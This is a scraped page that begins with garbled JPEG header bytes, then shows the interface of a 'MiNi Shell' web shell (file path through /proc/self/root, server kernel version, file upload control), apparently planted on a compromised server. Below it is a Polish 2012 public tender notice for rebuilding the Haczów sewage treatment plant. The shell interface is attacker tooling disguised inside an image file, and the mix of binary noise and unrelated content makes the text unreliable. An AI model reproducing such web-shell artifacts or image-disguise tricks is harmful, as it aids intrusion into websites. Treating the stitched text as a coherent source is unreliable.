JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20121203/485818-N-2012.html

<p class="kh_header"><b>Haczów: Przebudowa oczyszczalni ścieków  w  miejscowości Haczów</b><br>
<b>Numer ogłoszenia: 485818 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Haczów , Haczów 573, 36-213 Haczów, woj. podkarpackie, tel. 013 4391002, faks 013 4391696.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.haczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa oczyszczalni ścieków  w  miejscowości Haczów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Przebudowa oczyszczalni ścieków              w  miejscowości Haczów. Zadanie  polegało  będzie  na modernizacji istniejącej  mechaniczno-biologicznej oczyszczalni ścieków w miejscowości Haczów oraz  zmianie układu technologicznego z istniejących złóż zraszanych na układ przepływowy z klasycznym, niskoobciążonym osadem czynnym. Przepustowość oczyszczalni wynosi obecnie 930,0 m3/dobę i nie ulegnie zwiększeniu. Przedsięwzięcie  ma charakter proekologiczny, a oddziaływanie jego na środowisko będzie zgodne z obowiązującymi przepisami i normami w Polsce jak i państwach Unii Europejskiej.
Rozwiązania przebudowy i rozbudowy oczyszczalni ścieków mają na celu zminimalizowanie  i ograniczenie jej oddziaływania na otoczenie m.in. przez: prowadzenie zmechanizowanego sposobu usuwania skratek na kratach i piasku  w piaskowniku, workowanie skratek i piasku w momencie zakończenia procesu ich płukania i odwadniania, wyciszenie urządzeń (osłony akustyczne dla dmuchaw, lokalizacja dmuchaw w odpowiednim  pomieszczeniu. Zastosowanie pomp i mieszadeł zatapialnych, wykonanie przepompowni jako obiektów zamkniętych, zastosowanie automatycznej stacji przyjmującej ścieki dowożone.
W zakres robót  do wykonania wchodzą:
- wykonanie konstrukcji  obiektu
- wykonanie sieci miedzy obiektowych
- wykonanie obiektów  technologicznych
-zmiana  lokalizacji  stacji  transformatorowej
-wykonanie instalacji elektrycznej  i automatyki
- wykonanie dróg , placów wewnętrznych, ogrodzenia  obiektu
- obsługa  geodezyjna  ( wyznaczenie  miejsca  pod  obiekty budowlane  i inwentaryzacja powykonawcza)

Rozbudowa  obejmować będzie:  budowę  garażu , wiaty  garażowej,( kontenera technicznego), miejsca składowania skratek ( wiaty) , reaktorów  biologicznych, osadników  wtórnych, komory  pomiaru przepływu , przepompowni  wody  technologicznej, punktu zlewczego  ścieków  dowożonych, rurociągi  technologiczne, wodociąg , linię elektroenergetyczną, kanalizację deszczową. 
Przebudowa  obejmować będzie : budynek  technologiczny, komorę wlotową, projektowane  rurociągi technologiczne, wodociąg, linię elektroenergetyczną , kanalizację deszczową
Prace budowlane objęte niniejszym zakresem nie mogą zakłócać procesu technologicznego pracy istniejącej oczyszczalni ścieków w Haczowie.
Obiekt  który  powstanie    ma spełniać  aktualne  normy  czystości dla  oczyszczanych ścieków    w technologii osadu czynnego.
Szczegółowe dane  dotyczące obmiarów, szczegółowego zakresu prac  znajdują się w  przedmiarach  robót, dokumentacji  budowlanej obejmującej  poszczególne  branże: (sanitarną, architektoniczną, konstrukcyjną, drogową, elektryczną, aparaturę  kontrolna i pomiarową) , które  dołączone  zostały  w formie załączników do niniejszej SIWZ. 

Schemat technologiczny oczyszczalni przepływowej po rozbudowie przedstawiał  się  będzie  następująco: 
Mechaniczne oczyszczanie ścieków, punkt zlewny z automatyczną stacją dla ścieków - obiekt  projektowany, krata wstępna przed przepompownią - obiekt istniejący, bez zmian, przepompownia główna ścieków surowych- obiekt modernizowany, stacja mechanicznego oczyszczania ścieków - obiekt projektowany (sitopiaskownik napowietrzany z tłuszczownikiem, prasopłuczka skratek, płuczka piasku).				
Biologiczne oczyszczanie ścieków komora rozdziału przed reaktorami (KR) - obiekt projektowany, reaktory biologiczne 2 szt. - obiekty projektowane, osadniki wtórne 2 szt	 - obiekty projektowane, przepompownia osadu - obiekt projektowany, stacja dmuchaw - obiekt projektowany, komory pomiarowe ilości ścieków oczyszczonych- obiekty projektowane, wylot ścieków oczyszczonych- obiekt istniejący.
Część osadowa: mobilna stacja mechanicznego odwadniania i higienizacji  osadu- obiekt adaptowany, magazyn osadu nadmiernego- obiekt adaptowany, magazyn osadu odwodnionego i po higienizacji wapnem - obiekt istniejący, bez zmian.
Obiekty inne : budynek techniczno-socjalny - obiekt istniejący, bez zmian, wiata garażowa obudowana- obiekt projektowany, stanowisko mycia wuko - obiekt istniejący, bez zmian, wiata garażowa -obiekt projektowany, plac manewrowy 	- obiekt projektowany, placyk do składowania piasku- obiekt projektowany, wiata nad placykiem do składowania skratek - obiekt projektowany, przepompownia wody technologicznej - obiekt projektowany.
Dla przyjęcia ścieków dowożonych w sposób kontrolowany przewiduje się automatyczną stację zlewczą wyposażoną m.in. w: panel sterujący z komputerem, przepływomierz elektromagnetyczny, zasuwę odcinającą z napędem pneumatycznym, drukarkę, sprężarkę, moduł pomiarowy (pH, przewodność, temperatura).
Ścieki po przejściu przez stację zlewczą skierowane zostaną do istniejącej komory dolotowej do której obecnie wpływają ścieki surowe ze zlewni oczyszczalni. Modernizacja komory obejmuje wymianę zasuw. Stamtąd ścieki przepłyną jak dotychczas przez istniejącą kratę wstępną do przepompowni głównej ścieków surowych. W pompowni ścieków surowych należy wymienić pompy, armaturę i wyposażenie. Pompy będą o parametrach identycznych jak istniejące.
Ścieki z pompowni zostaną doprowadzone przewodem tłocznym do zblokowanego urządzenia separacji zawiesin mineralnych i tłuszczy, do stacji oczyszczania mechanicznego. Stacja ta będzie mieścić się w na poziomie +1 istniejącego obiektu technologicznego, w którym znajduje się przeznaczone do likwidacji złoże zraszane. 
Skratki separowane na zblokowanym sicie będą poddawane prasowaniu do stopnia uwodnienia 60-70 %. Przecedzone ścieki grawitacyjne przepłyną do napowietrzanego piaskownika   o przepustowości 20 l/ na s. Piaskownik gwarantuje efekt separacji 90% dla średnicy ziaren >0,2 mm. Wyposażony będzie w zgarniacz piasku i odtłuszczacz kołowy.
Mieszanina ścieków z piaskiem podana zostanie z piaskownika do płuczki, w której następuje rozdzielenie piasku oraz ścieków z zawartymi w nich częściami organicznymi. Części pływające (tłuszcze) zostaną skierowane do przepompowni głównej. Odseparowane na sicie, w piaskowniku  i płuczce części stałe, tj.: skratki i piasek gromadzone będą w zamykanych pojemnikach, które po zapełnieniu będą opróżniane na placykach przeznaczonych do tymczasowego składowania wypłukanego piasku (niezadaszony placyk do składowania piasku) i skratek (placyk pod wiatą do składowania skratek ). Stamtąd odpady będą okresowo wywożone na składowisko odpadów (piasek) lub do utylizacji (skratki). Odcieki po procesie mechanicznego oczyszczania ścieków kierowane będą do przepompowni głównej, a z niej powrotem do oczyszczania. Pomieszczenie krat będzie zabezpieczone w wentylację grawitacyjną i mechaniczną oraz zawór antyskażeniowy na dopływie wody do płukania. Ścieki, po oddzieleniu piasku, grawitacyjnie odpłyną do komory rozdziału, zlokalizowanej przed projektowanymi reaktorami.
Najpoważniejszą technologiczna  zmianą jest przeniesienie oczyszczania biologicznego ścieków ze złoża zraszanego znajdującego się obecnie w obiekcie nr 5 do dwóch projektowanych reaktorów biologicznych o objętości czynnej 806 m3 każdy. Zastosowanie denitryfikacji naprzemiennej pozwoli na rezygnację z recyrkulacji wewnętrznej i poprawi stopień usuwania azotu. Zbiorniki planuję się wyposażyć m.in. w mieszadła średnioobrotowe i system napowietrzania drobnopęcherzykowego. 
Sprężone powietrze dostarczane będzie do napowietrzaczy  z projektowanej stacji dmuchaw  zlokalizowanej w sąsiedztwie reaktorów biologicznych. Przewidywane maksymalne zapotrzebowanie powietrza dla projektowanych reaktorów wynosi ok.: 900 m3/h na reaktor.                      W stacji przewidziano 2 nowe dmuchawy z trzecią rezerwową umieszczone w obudowach dźwiękochłonnych.
Po reaktorach biologicznych mieszanina oczyszczonych biologicznie ścieków i osadu czynnego przepłynie grawitacyjnie do dwóch projektowanych osadników wtórnych. Osadniki przewiduje się jako radialne, o przepływie głównie pionowym, wyposażone w zgarniacz denny i zgarniacz części pływających. 
W bezpośrednim sąsiedztwie osadników wtórnych znajdują się komory pomiarowe natężenia przepływu ścieków oczyszczonych umożliwiające pomiar odpływu z każdego z osadników wtórnych osobno. Komory te zaprojektowano w postaci studni betonowych z kręgów prefabrykowanych wyposażone w przepływomierze elektromagnetyczne.
Z kanału ścieków oczyszczonych po osadniku wtórnym a przed komorą pomiarową zaplanowano odgałęzienie do przepompowni wody technologicznej. Przepompownię zaplanowano w postaci studni betonowej z kręgów prefabrykowanych Przepompownia będzie wyposażona w pompę zatapialną, której przewód tłoczny zakończony będzie punktem czerpnym. Ścieki oczyszczone mogą być wykorzystywane do spłukiwania powierzchni drogowych i podlewania zieleni. 
W bezpośrednim sąsiedztwie projektowanych osadników wtórnych powstanie nowa przepompownia osadów. Jej zadaniem będzie recyrkulacja zewnętrzna osadu  w nowych ciągach technologicznych. W projektowanej przepompowni osadu przewiduje się odciąganie osadu nadmiernego z systemu i przesyłanie go do magazynu osadu nadmiernego.
W celu uregulowania gospodarki osadowej zmieniona zostanie funkcja istniejących osadników Imhoffa.. Dotychczasowe osadniki Imhoffa po doposażeniu w mieszadła zatapialne i system odprowadzanie wód nadosadowych przyjmą funkcję magazynu osadu nadmiernego. Ponadto przewidziano możliwość wprowadzania do tych zbiorników osadów dowożonych z innych oczyszczalni.
Na oczyszczalni pracuje obecnie kompletna, mobilna stacja odwadniania i higienizacji osadu. Modernizacji będzie podlegać doprowadzenie osadu nadmiernego z magazynu osadu nadmiernego do stacji odwadniania, odprowadzanie odcieków ze stacji do dopływu do oczyszczalni (do istniejącego rurociągu dolotowego do komory dolotowej), oraz doprowadzenie wody. Osad po mechanicznym odwodnieniu na prasie i higienizowany wapnem skierowany będzie na placyk magazynu osadu odwodnionego zlokalizowany pod wiatą. Pod wiatą wykonana jest posadzka betonowa, boczne płyty osłonowe, bramy wjazdowe dla pojazdów oraz odwodnienie do kanalizacji zakładowej. Obiekty te są w bardzo dobrym  stanie technicznym, i nie są objęte modernizacją w ramach tego przedsięwzięcia. 
W ramach modernizacji budynku adaptowanego z obecnego budynku złoża przewiduję się ogrzewanie go energią cieplną uzyskaną dzięki pompie ciepła. Dolnym źródłem ciepła będą osadniki wtórne, dzięki czemu schłodzenie ścieków nie będzie miało negatywnego wpływu na procesy technologiczne.
Szczegółowy opis przedmiotu zamówienia znajduje się  w   następujących dokumentach dołączonych do  SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.10.00.00-0, 45.23.24.10-9, 45.23.24.21-9, 45.23.24.51-8, 45.23.14.00-9, 45.20.00.00-9, 45.22.30.00-6, 45.25.00.00-8, 45.23.10.00-5, 45.30.00.00-0, 45.40.00.00-1, 45.23.60.00-0, 45.23.31.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.03.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu dokonania oceny w/w warunku niezbędne są:
1) Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 1 pkt 2 ustawy PZP (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),  a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca posiada niezbędną wiedzę i doświadczenie, jeżeli wykaże się:
a) wykonaniem w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 robót budowlanych polegających na  wybudowaniu, rozbudowie lub modernizacji   oczyszczalni ścieków o przepustowości minimum 900 m3/dobę o parametrach i technologii zbieżnej z niniejszym postępowaniem.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy  i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;
W przypadku  przekształceń firmy  niezbędna jest ciągłość prowadzonej działalności</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje potencjałem technicznym do wykonania zamówienia, jeżeli:
a) dysponuje lub  dysponował będzie  sprzętem adekwatnym do wykonania niniejszego zamówienia.
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy   robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie dysponowania  tymi zasobami;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca dysponuje   osobami zdolnymi do wykonania zamówienia, jeżeli:
a) dysponuje lub dysponował będzie  osobami do wykonania zamówienia 		                         
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami,  w tym: 
a.1) przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności:  
- konstrukcyjno-budowlanej, 
-instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
- instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych i elektroenergetycznych oraz automatyki kontrolno-pomiarowej,
- drogowej
która będzie kierowała robotami i ma co najmniej trzyletnie doświadczenie w kierowaniu robotami budowlanymi w ww. specjalnościach; warunek uznaje się za spełniony jeżeli Wykonawca przedstawi co najmniej jedną osobę posiadającą wszystkie wymienione uprawnienia lub kilka osób posiadających jedno lub kilka z wymienionych uprawnień, osoby te łącznie powinny dysponować wszystkimi wymaganymi w specyfikacji uprawnieniami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek udziału w postępowaniu, jeżeli:
a) wykonawca posiada (dysponuje) na rachunku bankowym środkami pieniężnymi (lub posiada zdolność kredytową) 
Ocena spełniania warunku zostanie dokonana na podstawie oświadczenia o spełnianiu warunków   udziału w postępowaniu złożonego przez wykonawcę oraz na podstawie następujących dokumentów, jakie wykonawca powinien złożyć w postępowaniu:
a)informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

